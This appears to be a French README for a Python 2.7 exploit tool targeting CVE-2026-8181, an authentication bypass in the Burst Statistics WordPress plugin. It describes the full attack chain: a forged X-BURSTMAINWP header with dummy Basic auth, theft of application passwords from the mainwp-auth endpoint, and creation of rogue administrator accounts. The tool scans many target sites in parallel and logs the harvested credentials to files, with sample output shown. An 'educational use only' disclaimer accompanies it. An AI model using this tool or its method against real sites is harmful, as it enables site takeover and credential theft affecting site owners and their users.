
CVE-2026-8181 : Contournement d'authentification Burst Statistics → prise de contrôle de l'API REST & création d'administrateur. Python 2.7. Usage éducatif uniquement.
Exploit Python 2.7 pour la vulnérabilité du plugin Burst Statistics (CVE-2026-8181) qui permet à des attaquants non authentifiés de contourner l'authentification de l'API REST, de récupérer les mots de passe d'application et de créer de nouveaux utilisateurs administrateurs sur des sites WordPress vulnérables.
⚠️ Avertissement
Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le uniquement sur des sites Web que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test. Vous pouvez consulter l'avertissement complet sur le profil de Jenderal92. Consultez-le ICI !!!
CVE-2026-8181 affecte le plugin Burst Statistics pour WordPress (versions antérieures au correctif). La faille réside dans le mécanisme d'authentification de l'API REST, permettant à un attaquant de :
X-BURSTMAINWP spécialement conçu/burst/v1/mainwp-auth/, /wordpress, /wp)/wp-json/wp/v2/users ou redirections par ID d'auteurres_login.txt – Identifiants REST API concis, séparés par des barres verticales (faciles à analyser/importer)full_res_login.txt – Rapport complet lisible par un humain, incluant la vérification d'accès et les mots de passe d'applicationrequestspip install requests
Préparez un fichier de liste de cibles (un domaine ou une IP par ligne, avec ou sans http:///https://).
Exemple targets.txt :
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
Exécutez l'exploit :
python2 CVE-2026-8181.py targets.txt
res_login.txt – Identifiants REST API (une ligne par cible vulnérable)full_res_login.txt – Rapport détaillé| Argument | Description |
|---|---|
list.txt | Chemin vers le fichier contenant les URL cibles |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt – Identifiants REST API concisChaque ligne suit ce format séparé par des barres verticales :
target|username|password|email|user_id
Exemple :
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
Ce format est idéal pour :
cut, grep ou Excelfull_res_login.txt – Rapport complet et détailléPour chaque cible vulnérable, le script ajoute un bloc lisible par un humain :
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
Remarque : Si le point de terminaison du mot de passe d'application n'est pas disponible ou ne renvoie aucun jeton, cette section affichera
FAILED.
http:// s'il est manquant, supprime les barres obliques finales./, /wordpress et /wp comme répertoires de base WordPress./wp-json/wp/v2/users ou utilise les redirections ?author=N.X-BURSTMAINWP: 1 + authentification Basic avec le nom d'utilisateur et un mot de passe factice (CVE-2026-8181). Si le point de terminaison /wp-json/wp/v2/users/me?context=edit renvoie 200, le site est vulnérable./wp-json/burst/v1/mainwp-auth pour récupérer un jeton de mot de passe d'application./settings, /plugins, /users.POST /wp-json/wp/v2/users.res_login.txt et les détails complets dans full_res_login.txt.Vous pouvez modifier ces variables dans le script :
THREADS – Nombre de threads simultanés (10 par défaut)BASE_PATHS – Sous-répertoires WordPress supplémentaires à vérifierrequestsCe projet est fourni à des fins éducatives uniquement. Utilisez-le à vos propres risques.